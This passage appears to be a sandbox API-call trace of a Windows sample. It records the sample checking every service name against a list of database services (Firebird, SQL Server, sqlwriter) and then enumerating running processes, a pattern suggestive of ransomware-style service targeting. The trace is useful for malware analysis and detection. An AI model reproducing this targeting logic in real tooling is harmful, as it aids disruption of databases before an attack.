(lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0190.115] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0190.115] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0190.115] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0190.115] lstrlenW (lpString="DPS") returned 3 [0190.115] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0190.115] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0190.115] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0190.115] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0190.115] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0190.115] lstrlenW (lpString="DusmSvc") returned 7 [0190.115] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0190.115] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0190.115] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0190.115] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0190.115] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0190.115] lstrlenW (lpString="EventLog") returned 8 [0190.115] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0190.115] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0190.115] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0190.115] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0190.115] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0190.115] lstrlenW (lpString="EventSystem") returned 11 [0190.115] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0190.116] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0190.116] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0190.116] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0190.116] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0190.116] lstrlenW (lpString="FontCache") returned 9 [0190.116] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0190.116] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0190.116] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0190.116] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0190.116] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0190.116] lstrlenW (lpString="gpsvc") returned 5 [0190.116] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0190.116] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0190.116] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0190.116] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0190.116] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0190.116] lstrlenW (lpString="iphlpsvc") returned 8 [0190.116] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0190.116] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0190.116] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0190.116] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0190.116] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0190.116] lstrlenW (lpString="KeyIso") returned 6 [0190.116] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0190.116] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0190.116] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0190.116] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0190.116] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0190.116] lstrlenW (lpString="LanmanServer") returned 12 [0190.117] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0190.117] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0190.117] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0190.117] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0190.117] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0190.117] lstrlenW (lpString="LanmanWorkstation") returned 17 [0190.117] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0190.117] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0190.117] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0190.117] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0190.117] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0190.117] lstrlenW (lpString="lfsvc") returned 5 [0190.117] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0190.117] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0190.117] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0190.117] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0190.117] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0190.117] lstrlenW (lpString="lmhosts") returned 7 [0190.117] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0190.117] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0190.117] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0190.117] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0190.117] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0190.117] lstrlenW (lpString="LSM") returned 3 [0190.117] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0190.117] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0190.117] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0190.117] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0190.118] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0190.118] lstrlenW (lpString="MpsSvc") returned 6 [0190.118] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0190.118] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0190.118] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0190.118] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0190.118] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0190.118] lstrlenW (lpString="NcbService") returned 10 [0190.118] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0190.118] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0190.118] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0190.118] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0190.118] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0190.118] lstrlenW (lpString="netprofm") returned 8 [0190.118] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0190.118] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0190.118] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0190.118] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0190.118] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0190.118] lstrlenW (lpString="NgcSvc") returned 6 [0190.118] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0190.118] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0190.118] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0190.118] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0190.118] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0190.118] lstrlenW (lpString="NlaSvc") returned 6 [0190.118] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0190.118] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0190.118] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0190.119] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0190.119] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0190.119] lstrlenW (lpString="nsi") returned 3 [0190.119] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0190.119] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0190.119] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0190.119] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0190.119] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0190.119] lstrlenW (lpString="PcaSvc") returned 6 [0190.119] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0190.119] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0190.119] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0190.119] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0190.119] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0190.119] lstrlenW (lpString="PlugPlay") returned 8 [0190.119] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0190.119] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0190.119] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0190.119] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0190.119] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0190.119] lstrlenW (lpString="Power") returned 5 [0190.119] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0190.119] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0190.119] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0190.119] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0190.119] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0190.119] lstrlenW (lpString="ProfSvc") returned 7 [0190.119] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0190.119] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0190.119] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0190.120] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0190.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0190.120] lstrlenW (lpString="RpcEptMapper") returned 12 [0190.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0190.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0190.120] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0190.120] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0190.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0190.120] lstrlenW (lpString="RpcSs") returned 5 [0190.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0190.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0190.120] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0190.120] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0190.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0190.120] lstrlenW (lpString="SamSs") returned 5 [0190.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0190.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0190.120] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0190.120] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0190.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0190.120] lstrlenW (lpString="Schedule") returned 8 [0190.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0190.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0190.120] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0190.120] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0190.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0190.120] lstrlenW (lpString="SecurityHealthService") returned 21 [0190.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0190.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0190.121] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0190.121] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0190.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0190.121] lstrlenW (lpString="SENS") returned 4 [0190.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0190.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0190.121] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0190.121] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0190.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0190.121] lstrlenW (lpString="ShellHWDetection") returned 16 [0190.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0190.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0190.121] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0190.121] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0190.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0190.121] lstrlenW (lpString="Spooler") returned 7 [0190.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0190.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0190.121] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0190.121] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0190.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0190.121] lstrlenW (lpString="StateRepository") returned 15 [0190.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0190.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0190.121] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0190.121] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0190.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0190.122] lstrlenW (lpString="SysMain") returned 7 [0190.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0190.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0190.122] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0190.122] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0190.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0190.122] lstrlenW (lpString="SystemEventsBroker") returned 18 [0190.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0190.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0190.122] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0190.122] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0190.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0190.122] lstrlenW (lpString="Themes") returned 6 [0190.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0190.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0190.122] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0190.122] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0190.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0190.122] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0190.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0190.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0190.122] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0190.122] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0190.122] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x378 [0190.126] Process32FirstW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.127] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0190.127] lstrlenW (lpString="System") returned 6 [0190.128] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0190.128] lstrlenW (lpString="smss.exe") returned 8 [0190.128] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0190.129] lstrlenW (lpString="csrss.exe") returned 9 [0190.129] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0190.130] lstrlenW (lpString="wininit.exe") returned 11 [0190.130] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0190.131] lstrlenW (lpString="csrss.exe") returned 9 [0190.131] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0190.131] lstrlenW (lpString="winlogon.exe") returned 12 [0190.132] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0190.132] lstrlenW (lpString="services.exe") returned 12 [0190.132] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0190.133] lstrlenW (lpString="lsass.exe") returned 9 [0190.133] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0190.134] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0190.134] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0190.135] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0190.135] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.135] lstrlenW (lpString="svchost.exe") returned 11 [0190.135] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.136] lstrlenW (lpString="svchost.exe") returned 11 [0190.136] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0190.137] lstrlenW (lpString="dwm.exe") returned 7 [0190.137] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.138] lstrlenW (lpString="svchost.exe") returned 11 [0190.138] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.138] lstrlenW (lpString="svchost.exe") returned 11 [0190.139] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.139] lstrlenW (lpString="svchost.exe") returned 11 [0190.139] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.140] lstrlenW (lpString="svchost.exe") returned 11 [0190.140] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.141] lstrlenW (lpString="svchost.exe") returned 11 [0190.141] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.142] lstrlenW (lpString="svchost.exe") returned 11 [0190.142] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.143] lstrlenW (lpString="svchost.exe") returned 11 [0190.143] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.144] lstrlenW (lpString="svchost.exe") returned 11 [0190.144] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.144] lstrlenW (lpString="svchost.exe") returned 11 [0190.144] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.145] lstrlenW (lpString="svchost.exe") returned 11 [0190.145] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0190.146] lstrlenW (lpString="spoolsv.exe") returned 11 [0190.146] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, 